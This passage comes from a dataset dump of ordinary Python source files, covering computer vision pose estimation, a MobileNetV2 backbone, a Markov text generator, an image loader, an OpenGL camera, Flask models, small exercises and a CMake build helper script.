U)\n print('V = \\n', V)\n r_mat = np.matmul(U, V.transpose())\n\n t_vec = np.mean(p_1, axis=0)[:, np.newaxis] - r_mat.dot(np.mean(p_2, axis=0)[:, np.newaxis])\n\n return r_mat, t_vec\n\n\ndef bundle_adjustment(ps_1, ps_2, r_mat, t_vec):\n optimizer = g2o.SparseOptimizer()\n solver = g2o.BlockSolverSim3(g2o.LinearSolverCSparseSim3())\n solver = g2o.OptimizationAlgorithmLevenberg(solver)\n optimizer.set_algorithm(solver)\n\n pose = g2o.VertexSE3Expmap()\n pose.set_estimate(g2o.SE3Quat(np.identity(3), np.zeros((3,))))\n pose.set_id(0)\n optimizer.add_vertex(pose)\n\n index = 1\n for p1, p2 in zip(ps_1, ps_2):\n edge = g2o.EdgeStereoSE3ProjectXYZOnlyPose()\n edge.cam_project(p2)\n edge.set_id(index)\n edge.set_vertex(0, pose)\n edge.set_measurement(p1)\n edge.set_information(np.identity(3))\n optimizer.add_edge(edge)\n index += 1\n\n optimizer.initialize_optimization()\n optimizer.set_verbose(True)\n optimizer.optimize(100)\n print('T = \\n', pose.estimate().matrix())\n\n\nif __name__ == '__main__':\n img_1 = cv.imread('1.png')\n img_2 = cv.imread('2.png')\n key_points_1, key_points_2, matches = find_feature_matches(img_1, img_2)\n print('Found a total of', len(matches), 'matched point pairs')\n\n depth1 = cv.imread('1_depth.png', -1)\n depth2 = cv.imread('2_depth.png', -1)\n p_3d_1 = []\n p_3d_2 = []\n for m in matches:\n d1 = depth1[int(key_points_1[m.queryIdx].pt[1]), int(key_points_1[m.queryIdx].pt[0])]\n d2 = depth2[int(key_points_2[m.trainIdx].pt[1]), int(key_points_2[m.trainIdx].pt[0])]\n if d1 == 0 or d2 == 0:\n continue\n d1 = d1/5000.0\n d2 = d2/5000.0\n p1 = pixel2cam(key_points_1[m.queryIdx].pt, K)\n p2 = pixel2cam(key_points_2[m.trainIdx].pt, K)\n p_3d_1.append([p1[0, 0]*d1, p1[1, 0]*d1, d1])\n p_3d_2.append([p2[0, 0]*d2, p2[1, 0]*d2, d2])\n\n p_3d_1 = np.array(p_3d_1)\n p_3d_2 = np.array(p_3d_2)\n print(\"3d-2d pairs: \", p_3d_1.shape[0])\n\n R, t = pose_estimation_3d3d(p_3d_1, p_3d_2)\n print('ICP via SVD results: ')\n print('R = \\n', R, '\\nt = \\n', t)\n print('R_inv = \\n', R.transpose(), '\\nt_inv = \\n', -R.transpose().dot(t))\n\n print('calling bundle adjustment')\n bundle_adjustment(p_3d_1, p_3d_2, R, t)\n\n for p1, p2 in zip(p_3d_1[:5, :], p_3d_2[:5, :]):\n print('p1 = ', p1)\n print('p2 = ', p2)\n print('R * p2 + t = ', R.dot(p2[:, np.newaxis]) + t)\n","sub_path":"ch7/pose_estimation_3d3d.py","file_name":"pose_estimation_3d3d.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"215512373","text":"## This script acts as a module for ccu_over_time_plot\r\n\r\nimport pandas\r\n\r\ndf = pandas.read_csv(\"C:/Users/Usuario/Documents/Visual Studio Code/dashboard/steam_data/top_games_by_ccu - Copy.csv\")\r\n\r\ndef plot_data(games, date):\r\n boolean = [x[:10] == date for x in df.Hora] #list of booleans used to filter the df by date\r\n results_by_date = df[boolean]\r\n results_by_date.reset_index(drop = True, inplace = True) #resetting the indexes\r\n\r\n for i in range(len(results_by_date)):\r\n hours = int(results_by_date.Hora[i][-5: -3]) #hour as an integer (hours and minutes are extracted by string slicing)\r\n minutes = int(results_by_date.Hora[i][-2:]) #analogous\r\n minutes_in_hours = round(minutes/60, 3) #converting the minutes to hours and rounding to 3 decimal places\r\n results_by_date.Hora[i] = hours + minutes_in_hours\r\n \r\n results_by_date_and_name = [] #list of dataframes, each element is a dataframe for one of the games\r\n for game in games:\r\n data = results_by_date.loc[lambda x : x.Nome == game]\r\n results_by_date_and_name.append(data)\r\n\r\n return pandas.concat(results_by_date_and_name)\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"steam_data/ccu_over_time.py","file_name":"ccu_over_time.py","file_ext":"py","file_size_in_byte":1177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117651681","text":"import logging\n\nimport torch.nn as nn\nfrom mmcv.runner import load_checkpoint\n\nfrom ..registry import BACKBONES\n\n\ndef _make_divisible(v, divisor, min_value=None):\n \"\"\"\n This function is taken from the original tf repo.\n It ensures that all layers have a channel number that is divisible by 8\n It can be seen here:\n https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n :param v:\n :param divisor:\n :param min_value:\n :return:\n \"\"\"\n if min_value is None:\n min_value = divisor\n new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n # Make sure that round down does not go down by more than 10%.\n if new_v < 0.9 * v:\n new_v += divisor\n return new_v\n\n\nclass ConvBNReLU(nn.Sequential):\n\n def __init__(self,\n in_planes,\n out_planes,\n kernel_size=3,\n stride=1,\n groups=1):\n padding = (kernel_size - 1) // 2\n super(ConvBNReLU, self).__init__(\n nn.Conv2d(\n in_planes,\n out_planes,\n kernel_size,\n stride,\n padding,\n groups=groups,\n 
bias=False), nn.BatchNorm2d(out_planes),\n nn.ReLU6(inplace=True))\n\n\nclass InvertedResidual(nn.Module):\n\n def __init__(self, inp, oup, stride, expand_ratio):\n super(InvertedResidual, self).__init__()\n self.stride = stride\n assert stride in [1, 2]\n\n hidden_dim = int(round(inp * expand_ratio))\n self.use_res_connect = self.stride == 1 and inp == oup\n\n layers = []\n if expand_ratio != 1:\n # pw\n layers.append(ConvBNReLU(inp, hidden_dim, kernel_size=1))\n layers.extend([\n # dw\n ConvBNReLU(\n hidden_dim, hidden_dim, stride=stride, groups=hidden_dim),\n # pw-linear\n nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n nn.BatchNorm2d(oup),\n ])\n self.conv = nn.Sequential(*layers)\n\n def forward(self, x):\n if self.use_res_connect:\n return x + self.conv(x)\n else:\n return self.conv(x)\n\n\n@BACKBONES.register_module\nclass MobileNetV2(nn.Module):\n \"\"\"\n MobileNetV2 is taken from pytorch hub.\n https://github.com/pytorch/vision/blob/master/torchvision/models/mobilenet.py\n \"\"\"\n\n def __init__(self,\n out_indices=(1, 2, 4, 6),\n frozen_stages=-1,\n width_mult=1.0,\n inverted_residual_setting=None,\n round_nearest=8):\n \"\"\"\n MobileNet V2 main class\n Args:\n width_mult (float): Width multiplier - adjusts number of channels\n in each layer by this amount\n inverted_residual_setting: Network structure\n round_nearest (int): Round the number of channels in each layer to\n be a multiple of this number. Set to 1 to turn off rounding\n \"\"\"\n super(MobileNetV2, self).__init__()\n block = InvertedResidual\n input_channel = 32\n\n if inverted_residual_setting is None:\n inverted_residual_setting = [\n # t, c, n, s\n [1, 16, 1, 1], # 0\n [6, 24, 2, 2], # 1\n [6, 32, 3, 2], # 2\n [6, 64, 4, 2], # 3\n [6, 96, 3, 1], # 4\n [6, 160, 3, 2], # 5\n [6, 320, 1, 1], # 6\n ]\n\n # only check the first element,\n # assuming user knows t,c,n,s are required\n if len(inverted_residual_setting) == 0 or len(\n inverted_residual_setting[0]) != 4:\n raise ValueError(\"inverted_residual_setting should be non-empty \"\n \"or a 4-element list, got {}\".format(\n inverted_residual_setting))\n\n self.frozen_stages = frozen_stages\n self.out_indices = out_indices\n assert max(out_indices) < len(inverted_residual_setting)\n # building first layer\n input_channel = _make_divisible(input_channel * width_mult,\n round_nearest)\n self.conv1 = ConvBNReLU(3, input_channel, stride=2)\n # building inverted residual blocks\n self.stages = []\n for si, (t, c, n, s) in enumerate(inverted_residual_setting):\n output_channel = _make_divisible(c * width_mult, round_nearest)\n stage = []\n for i in range(n):\n stride = s if i == 0 else 1\n stage.append(\n block(\n input_channel, output_channel, stride, expand_ratio=t))\n input_channel = output_channel\n stage_name = 'stage{}'.format(si + 1)\n self.add_module(stage_name, nn.Sequential(*stage))\n self.stages.append(stage_name)\n\n self._freeze_stages()\n\n def _freeze_stages(self):\n if self.frozen_stages >= 0:\n self.conv1.eval()\n for param in self.conv1.parameters():\n param.requires_grad = False\n\n for i in range(1, self.frozen_stages + 1):\n m = getattr(self, 'stage{}'.format(i))\n m.eval()\n for param in m.parameters():\n param.requires_grad = False\n\n def init_weights(self, pretrained=None):\n if isinstance(pretrained, str):\n logger = logging.getLogger()\n load_checkpoint(self, pretrained, strict=False, logger=logger)\n elif pretrained is None:\n # weight initialization\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n 
nn.init.kaiming_normal_(m.weight, mode='fan_out')\n if m.bias is not None:\n nn.init.zeros_(m.bias)\n elif isinstance(m, nn.BatchNorm2d):\n nn.init.ones_(m.weight)\n nn.init.zeros_(m.bias)\n else:\n raise TypeError('pretrained must be a str or None')\n\n def forward(self, x):\n x = self.conv1(x)\n outs = []\n for i, stage_name in enumerate(self.stages):\n stage = getattr(self, stage_name)\n x = stage(x)\n if i in self.out_indices:\n outs.append(x)\n return tuple(outs)","sub_path":"mmdet/models/backbones/mobilenet.py","file_name":"mobilenet.py","file_ext":"py","file_size_in_byte":6411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"117239759","text":"\"\"\"A Markov chain generator that can tweet random messages.\"\"\"\n\nimport sys\nfrom random import choice\nimport os\nimport discord\ndef open_and_read_file(file_path):\n \"\"\"Take file path as string; return text as string.\n\n Takes a string that is a file path, opens the file, and returns\n the file's contents as one string of text.\n \"\"\"\n\n # your code goes here\n\n return open(file_path).read()\n\n\ndef make_chains(text_string, gram_num):\n \"\"\"Take input text as string; return dictionary of Markov chains.\n\n A chain will be a key that consists of a tuple of (word1, word2)\n and the value would be a list of the word(s) that follow those two\n words in the input text.\n\n For example:\n\n >>> chains = make_chains(\"hi there mary hi there juanita\")\n\n Each bigram (except the last) will be a key in chains:\n\n >>> sorted(chains.keys())\n [('hi', 'there'), ('mary', 'hi'), ('there', 'mary')]\n\n Each item in chains is a list of all possible following words:\n\n >>> chains[('hi', 'there')]\n ['mary', 'juanita']\n \n >>> ('there', 'juanita') in chains\n False\n \"\"\"\n\n words = text_string.split()\n chains = {}\n\n for index in range(len(words) - gram_num):\n #to account for unknown number of words making up chain\n #use list slicing to grab n number of words\n #convert that list slice back into a tuple\n ngram = tuple(words[index:gram_num + index])\n #the next word after n words will be the index + n\n 
following_word = words[index + gram_num]\n \n #try to append, if key does not yet exist set an empty list first\n chains.setdefault(ngram, []).append(following_word)\n\n # if word_pair in chains:\n # chains[word_pair].append(following_word)\n # else:\n # chains[word_pair] = [following_word] \n\n return chains\n\n\ndef make_text(chains):\n \"\"\"Return text from chains.\"\"\"\n\n words = []\n\n #generating a list of valid starting tuples\n #in this case, only tuples with capitalized first words\n starting_tuples = [word_tup for word_tup in chains\n if word_tup[0][0].isupper()]\n\n ngram = choice(starting_tuples)\n\n words.extend(ngram)\n\n word_limit = 100\n\n while ngram in chains:\n\n next_word = choice(chains[ngram])\n words.append(next_word)\n\n #to build the next gram for an unknown length of chain\n #use list slicing to cut out first word in tuple\n end_of_gram = list(ngram)[1:]\n\n #add on my following word\n end_of_gram.append(next_word)\n\n #convert that list back into a tuple to match keys in dictionary\n ngram = tuple(end_of_gram)\n\n if len(words) > word_limit:\n break\n\n return \" \".join(words)\n\n\ninput_path = sys.argv[1]\n\n# Open the file and turn it into one long string\ninput_text = open_and_read_file(input_path)\n\n# Get a Markov chain\nchains = make_chains(input_text, 2)\n\n# Produce random text\nrandom_text = make_text(chains)\n\nprint(random_text)\n\n# #adding in discord posting functionality\n# client = discord.Client()\n\n\n# @client.event\n# async def on_ready():\n# print(f'Successfully connected! Logged in as {client.user}.')\n\n\n# @client.event\n# async def on_message(message):\n# if message.author == client.user:\n# return\n\n# if client.user in message.mentions:\n# await message.channel.send(random_text)\n\n\n# client.run(os.environ['DISCORD_TOKEN'])\n","sub_path":"markov.py","file_name":"markov.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"263283147","text":"from sklearn.svm import LinearSVC\n\nfrom utils.hyperparameters import HyperParameters\nfrom .traditional_model import TraditionalModel\n\n\nclass LinearSVMModel(TraditionalModel):\n\n def __init__(self, hyper_parameters: HyperParameters, save_folder: str, is_train: bool):\n super().__init__(hyper_parameters, save_folder, is_train)\n\n self._model = None\n self.name = 'linear-svm'\n\n def make(self, is_train: bool, is_frozen: bool):\n if self.model is not None:\n return\n\n self._model = LinearSVC(penalty=self.hypers.model_params['penalty'],\n C=self.hypers.model_params['regularization_strength'],\n dual=False,\n max_iter=self.hypers.model_params['max_iters'])\n","sub_path":"src/models/linear_svm.py","file_name":"linear_svm.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"223475925","text":"import os\nfrom typing import List, Union, Tuple\n\nimport cv2\nimport numpy as np\nimport torch\nfrom torchvision.datasets import DatasetFolder\nfrom torchvision.transforms import ToPILImage, Compose, ToTensor\n\nimport config\nfrom utils import split_path\n\ndef make_dataset(root: str, files: List) -> List[str]:\n images = []\n\n for image in sorted(files):\n path = os.path.join(root, image)\n images.append(path)\n\n return images\n\n\nclass ImageLoader(DatasetFolder):\n def __init__(self,\n root_path: str,\n image_size: Tuple[int, int, int],\n transform: Compose = None,\n training: bool = True,\n crops: 
Tuple[Tuple[int, int], Tuple[int, int]] = ((0, 384), (0, 384))):\n\n super(DatasetFolder, self).__init__(root_path, transform=transform, target_transform=None)\n\n if image_size[0] == 1:\n phase = False\n else:\n phase = True\n\n folders = set()\n\n input_images_amp = {}\n input_images_phase = {}\n reference_images_amp = {}\n reference_images_phase = {}\n\n for root, dirs, files in os.walk(root_path):\n if config.INPUT_FOLDER_NAME in root and config.AMP_FOLDER_NAME in root:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n input_images_amp[folder_name] = make_dataset(root, files)\n if config.INPUT_FOLDER_NAME in root and config.PHASE_FOLDER_NAME in root and phase:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n input_images_phase[folder_name] = make_dataset(root, files)\n if config.REFERENCE_FOLDER_NAME in root and config.AMP_FOLDER_NAME in root and training:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n reference_images_amp[folder_name] = make_dataset(root, files)\n if config.REFERENCE_FOLDER_NAME in root and config.PHASE_FOLDER_NAME in root and phase and training:\n folder_name = split_path(root)[-3]\n folders.add(folder_name)\n reference_images_phase[folder_name] = make_dataset(root, files)\n\n self.input_images_amp = []\n self.input_images_phase = []\n self.reference_images_amp = []\n self.reference_images_phase = []\n\n for i in folders:\n self.input_images_amp.extend(input_images_amp[i])\n if phase:\n try:\n self.input_images_phase.extend(input_images_phase[i])\n except KeyError:\n print(f'Could not find input phase folder for {i} although phase was required')\n\n if training:\n assert (len(input_images_amp[i]) == len(reference_images_amp[i])), f'Not the same amount of input ' \\\n f'and ' \\\n f'reference images in amp folder ' \\\n f'{i}!'\n try:\n self.reference_images_amp.extend(reference_images_amp[i])\n except KeyError:\n print(f'Error, loader in training mode requires a reference folder for every input folder ({i})!')\n if phase:\n assert (len(input_images_phase[i]) == len(reference_images_phase[i])), f'Not the same amount of ' \\\n f'input and reference ' \\\n f'images in phase folder ' \\\n f'{i}! 
'\n try:\n self.reference_images_phase.extend(reference_images_phase[i])\n except KeyError:\n print(f'Could not find reference phase folder for {i} although phase was required')\n\n self.phase = phase\n self.image_size = (image_size[1], image_size[2])\n self.training = training\n self.crops = crops\n self.val = False\n\n def _get_image(self, index: int, is_input: bool) -> np.ndarray:\n if is_input:\n amp_path = self.input_images_amp[index]\n if self.phase:\n phase_path = self.input_images_phase[index]\n else:\n amp_path = self.reference_images_amp[index]\n if self.phase:\n phase_path = self.reference_images_phase[index]\n amp = cv2.imread(amp_path, cv2.IMREAD_GRAYSCALE)\n\n if self.phase:\n phase = cv2.imread(phase_path, cv2.IMREAD_GRAYSCALE)\n amp_and_phase = np.stack([amp, phase])\n final_image = amp_and_phase\n else:\n final_image = amp\n\n return final_image\n\n def __getitem__(self, item: int) -> Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]:\n input_image = self._get_image(item, True)\n if input_image is None:\n print(self.input_images_amp[item])\n if self.training:\n reference_image = self._get_image(item, False)\n if self.phase:\n if input_image.shape[1] != reference_image.shape[1]:\n input_image = input_image[:, input_image.shape[1] - reference_image.shape[1]:]\n combined = np.concatenate((input_image, reference_image), axis=0)\n else:\n combined = np.array([input_image, reference_image])\n if combined.shape[1] == self.image_size[0]:\n crop_x_lower = 0\n else:\n crop_x_lower = np.random.randint(0, combined.shape[1] - self.image_size[0])\n crop_x_upper = crop_x_lower + self.image_size[0]\n if combined.shape[2] == self.image_size[1]:\n crop_y_lower = 0\n else:\n crop_y_lower = np.random.randint(0, combined.shape[2] - self.image_size[1])\n crop_y_upper = crop_y_lower + self.image_size[1]\n if self.val:\n if input_image.shape[2] != 301:\n lower = int((input_image.shape[2] - 301) / 2)\n crops = ((0, 1024), (lower, lower + 301))\n else:\n crops = ((0, 1024), (0, 301))\n combined_cropped = combined[:, crops[0][0]:crops[0][1], crops[1][0]:crops[1][1]]\n else:\n combined_cropped = combined[:, crop_x_lower:crop_x_upper, crop_y_lower:crop_y_upper]\n combined_cropped = np.moveaxis(combined_cropped, 0, -1)\n\n combined_PIL = ToPILImage()(combined_cropped)\n if self.val:\n transformed = ToTensor()(combined_PIL)\n else:\n transformed = self.transform(combined_PIL)\n if self.phase:\n i = 2\n else:\n i = 1\n input_image = transformed[0:i, :, :]\n reference_image = transformed[i:i + i, :, :]\n\n return input_image, reference_image\n else:\n if input_image.shape[2] != 301:\n lower = int((input_image.shape[2] - 301) / 2)\n crops = ((0, 1024), (lower, lower + 301))\n else:\n crops = ((0, 1024), (0, 301))\n if self.phase:\n cropped = input_image[:, crops[0][0]:crops[0][1], crops[1][0]:crops[1][1]]\n cropped = np.moveaxis(cropped, 0, -1)\n else:\n cropped = input_image[crops[0][0]:crops[0][1], crops[1][0]:crops[1][1]]\n cropped_PIL = ToPILImage()(cropped)\n input_image = self.transform(cropped_PIL)\n\n return input_image\n\n def __len__(self) -> int:\n return len(self.input_images_amp)\n","sub_path":"ImageLoader.py","file_name":"ImageLoader.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"130676037","text":"\n\nfrom xai.brain.wordbase.verbs._erupt import _ERUPT\n\n#calss header\nclass _ERUPTED(_ERUPT, ):\n\tdef __init__(self,): \n\t\t_ERUPT.__init__(self)\n\t\tself.name = 
\"ERUPTED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"erupt\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_erupted.py","file_name":"_erupted.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455597704","text":"import numpy as np\n\n\ndef sphereFit(sphere):\n if not isinstance(sphere, np.ndarray):\n raise TypeError('Expected numpy array.')\n if sphere.shape[1] != 3:\n raise ValueError('Expected array of shape (n, 3).')\n spX = np.array(sphere[:,0])\n spY = np.array(sphere[:,1])\n spZ = np.array(sphere[:,2])\n A = np.zeros(shape=(len(spX), 4))\n A[:,0] = spX * 2\n A[:,1] = spY * 2\n A[:,2] = spZ * 2\n A[:,3] = 1\n\n b = np.zeros((len(spX),1))\n b[:,0] = spX**2 + spY**2 + spZ**2\n x, _, _, _ = np.linalg.lstsq(A, b, rcond=None)\n\n radius = np.sqrt(x[0]**2 + x[1]**2 + x[2]**2 + x[3])[0]\n center = (x[0], x[1], x[2])\n\n return radius, center\n\ndef calcRMS(radius, center, sphere):\n Ri = np.sqrt((sphere[:,0] - center[0])**2 + (sphere[:,1] - center[1])**2 + (sphere[:,2] - center[2])**2)\n return sum(abs(Ri - radius)) / Ri.size","sub_path":"Python/SphereFit.py","file_name":"SphereFit.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112790051","text":"\"\"\"code that is repeated in all kind of scenes\"\"\"\nfrom glfw import *\nfrom OpenGL.GL import *\nimport numpy as np\n\nimport camera\nimport glm\nfrom gl_utils import initialize_glfw\nimport camera\n\ncam1 = camera.Camera(position=glm.vec3(0, 2, 5))\ndelta_time = 0.\nlast_frame_time = 0.\nlast_mouse_x = 300.\nlast_mouse_y = 300.\nfirst_mouse = True\nkeys = [False] * 1024\ntime = 0.\n\n\n# User input\ndef key_callback(win, key, scancode, action, mods):\n global keys\n\n if key == GLFW_KEY_ESCAPE and action == GLFW_PRESS:\n glfwSetWindowShouldClose(win, True)\n\n if action == GLFW_PRESS:\n keys[key] = True\n elif action == GLFW_RELEASE:\n keys[key] = False\n\n\ndef mouse_callback(win, mouse_x, mouse_y):\n global last_mouse_x, last_mouse_y\n global first_mouse\n\n if first_mouse:\n first_mouse = False\n last_mouse_x = mouse_x\n last_mouse_y = mouse_y\n\n offset_x = mouse_x - last_mouse_x\n offset_y = last_mouse_y - mouse_y # invert y\n\n last_mouse_x = mouse_x\n last_mouse_y = mouse_y\n\n cam1.process_mouse_movement(offset_x, offset_y)\n\n\ndef scroll_callback(win, offset_x, offset_y):\n cam1.process_mouse_scroll(offset_y)\n\n\ndef move_camera():\n global cam1, delta_time, keys\n\n if keys[GLFW_KEY_W]:\n cam1.process_keyboard(camera.Movement.forward, delta_time)\n if keys[GLFW_KEY_S]:\n cam1.process_keyboard(camera.Movement.backward, delta_time)\n if keys[GLFW_KEY_A]:\n cam1.process_keyboard(camera.Movement.left, delta_time)\n if keys[GLFW_KEY_D]:\n cam1.process_keyboard(camera.Movement.right, delta_time)\n if keys[GLFW_KEY_R]:\n cam1.process_keyboard(camera.Movement.up, delta_time)\n if keys[GLFW_KEY_F]:\n cam1.process_keyboard(camera.Movement.down, delta_time)\n if keys[GLFW_KEY_LEFT]:\n cam1.process_keyboard(camera.Movement.turn_left, delta_time)\n if keys[GLFW_KEY_RIGHT]:\n cam1.process_keyboard(camera.Movement.turn_right, delta_time)\n if keys[GLFW_KEY_UP]:\n cam1.process_keyboard(camera.Movement.turn_up, delta_time)\n if keys[GLFW_KEY_DOWN]:\n cam1.process_keyboard(camera.Movement.turn_down, delta_time)\n\nwindow = initialize_glfw(width=800, height=800,\n key_callback=key_callback, mouse_callback=mouse_callback,\n 
scroll_callback=scroll_callback)\n\n\n# glfwSetInputMode(window, GLFW_CURSOR, GLFW_CURSOR_DISABLED)\nw, h = glfwGetFramebufferSize(window)\nglViewport(0, 0, w, h)\n# glDepthRange(-10, 10)\n\nglEnable(GL_DEPTH_TEST)  # draw only if the shape is closer to the viewer\nglDepthFunc(GL_LESS)  # smaller means closer\n# glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)  # Wireframe\n\n\ndef update():\n    global time, last_frame_time, delta_time\n    global view, projection\n\n    time = glfwGetTime()\n    delta_time = time - last_frame_time\n    last_frame_time = time\n    glfwPollEvents()\n    move_camera()\n\n    glClearColor(0., 0., 0., 1.0)\n    glClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\n    # Set viewpoint\n    # View via rotating camera\n    # rad = 3.\n    # view = glm.look_at(pos=glm.vec3(np.sin(time)*rad, 1.5, np.cos(time)*rad), target=glm.vec3(0, 0, 0))\n    # projection = glm.create_perspective_projection_matrix(45., 600. / 600., .1, 100.0, dtype=np.float32)\n\n    # View via user-controlled camera object\n    view = cam1.get_view_matrix()\n    projection = glm.create_perspective_projection_matrix(cam1.fov, 600. / 600., .1, 100.0, dtype=np.float32)\n    # projection = glm.create_orthogonal_projection_matrix(-3, 3, -3, 3, 0.1, 100, dtype=np.float32)\n","sub_path":"engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"361791525","text":"\nfrom flask import Flask\nfrom flask_sqlalchemy import SQLAlchemy\n\ndb = SQLAlchemy()\n\napp = Flask(__name__)\napp.secret_key = 'SUNDERED'\n\nclass Tribe(db.Model):\n\t\"\"\"Indigenous peoples in North America\"\"\"\n\n\t__tablename__ = 'tribes'\n\n\ttribe_id = db.Column(db.Integer(), autoincrement=True, primary_key=True)\n\tname = db.Column(db.String(), nullable=True, unique=True)\n\tregion = db.Column(db.String(), nullable=True)\n\tdescription = db.Column(db.String(), nullable=True)\n\tlanguage_id = db.Column(db.Integer(), db.ForeignKey('languages.language_id'))\n\t\n\tdef __repr__(self):\n\n\t\treturn f''\n\n\nclass Language(db.Model):\n\t\"\"\"Languages of North America\"\"\"\n\n\t__tablename__ = 'languages'\n\n\tlanguage_id = db.Column(db.Integer(), autoincrement=True, primary_key=True)\n\tlanguage_name = db.Column(db.String(), nullable=True, unique=True)\n\tlanguage_family = db.Column(db.String(), nullable=True)\n\n\n\tdef __repr__(self):\n\n\t\treturn f''\n\n\ndef connect_to_db(app):\n\n\tapp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///kindred'\n\tapp.config['SQLALCHEMY_ECHO'] = True\n\tapp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n\tdb.app = app\n\tdb.init_app(app)\n\n\nif __name__ == \"__main__\":\n\n\tfrom server import app\n\tconnect_to_db(app)\n\tprint('Connected to database.')","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"142314084","text":"from turtle import *\nclass Venta:\n    def __init__(self, venta, perdida, ganancia):\n        self.venta, self.perdida, self.ganancia = venta, 100-perdida, 100+ganancia\n        self.precio_uno, self.precio_dos = (self.venta*100)/self.perdida, (self.venta*100)/self.ganancia\n    def resultado(self):\n        self.resultado_perdida = self.precio_uno-self.venta\n        self.resultado_ganancia = self.venta-self.precio_dos\n        self.resultado = self.resultado_perdida - self.resultado_ganancia\nsetup(600,600)\npu()\ngoto(-100,100)\npd()\nventa = int(numinput('Venta', 'Venta de ambas'))\nperdida = 
int(numinput('Perdida', 'Porcentaje perdido'))\nganancia = int(numinput('Ganancia', 'Porcentaje ganado'))\nVenta = Venta(venta, perdida, ganancia)\npu()\ngoto(-100,90)\npd()\nVenta.resultado()\nif Venta.resultado_perdida > Venta.resultado_ganancia:\n write('Hubo perdida de: ')\nelse:\n write('Hubo ganancia de: ')\npu()\ngoto(-100,80)\npd()\nwrite(Venta.resultado)\nexitonclick()\n","sub_path":"first/third/computadoras.py","file_name":"computadoras.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5456282","text":"import sys\ninput = sys.stdin.readline\n\nn = int(input())\np = list(map(int,input().split()))\n\nresult = 0\np.sort()\n\nfor i in range(n):\n for j in range(i+1):\n result += p[j]\n\nprint(result)\n","sub_path":"boj(baekjoon)/boj_11399(2).py","file_name":"boj_11399(2).py","file_ext":"py","file_size_in_byte":195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339475071","text":"#!/usr/bin/python3\n#\n# Copyright (c) 2019-2021 Ruben Perez Hidalgo (rubenperez038 at gmail dot com)\n#\n# Distributed under the Boost Software License, Version 1.0. (See accompanying\n# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)\n#\n\nfrom sys import argv\nfrom subprocess import check_call\nfrom os import chdir, path\n\nREPO_BASE = path.abspath(path.join(path.dirname(__file__), '..'))\n\nBASE_CONFIG = {\n 'CMAKE_PREFIX_PATH': '/opt/boost-latest',\n 'CMAKE_INSTALL_PREFIX': '/tmp/boost_mysql'\n}\n\nCLANG_CONFIG = {\n 'CMAKE_C_COMPILER': 'clang',\n 'CMAKE_CXX_COMPILER': 'clang++'\n}\n\nALL_CONFIGS = {\n 'gcc-7': {\n **BASE_CONFIG,\n 'CMAKE_C_COMPILER': 'gcc-7',\n 'CMAKE_CXX_COMPILER': 'g++-7',\n 'CMAKE_BUILD_TYPE': 'Debug'\n },\n 'clang-debug': {\n **BASE_CONFIG,\n **CLANG_CONFIG,\n 'CMAKE_BUILD_TYPE': 'Debug'\n },\n 'clang-release': {\n **BASE_CONFIG,\n **CLANG_CONFIG,\n 'CMAKE_BUILD_TYPE': 'Release'\n },\n 'clang10-debug': {\n **BASE_CONFIG,\n 'CMAKE_C_COMPILER': 'clang-10',\n 'CMAKE_CXX_COMPILER': 'clang++-10',\n 'CMAKE_BUILD_TYPE': 'Debug'\n },\n 'install': {\n **BASE_CONFIG,\n 'BUILD_TESTING': 'OFF'\n }\n}\n\ndef usage():\n print('{} '.format(argv[0]))\n print('Available configs:')\n for name in ALL_CONFIGS.keys():\n print(' ' + name)\n exit(1)\n \ndef cmd(args):\n print(' + ' + ' '.join(args))\n check_call(args)\n\ndef main():\n if len(argv) != 2:\n usage()\n cfg_name = argv[1]\n cfg = ALL_CONFIGS.get(cfg_name)\n if cfg is None:\n usage()\n\n build_dir = 'build-{}'.format(cfg_name)\n cmake_args = ['-D{}={}'.format(key, value) for key, value in cfg.items()]\n chdir(REPO_BASE)\n cmd(['rm', '-rf', build_dir])\n cmd(['mkdir', build_dir])\n chdir(build_dir)\n cmd(['cmake'] + cmake_args + ['..'])\n cmd(['make', '-j4', 'install', 'test'])\n\nif __name__ == '__main__':\n 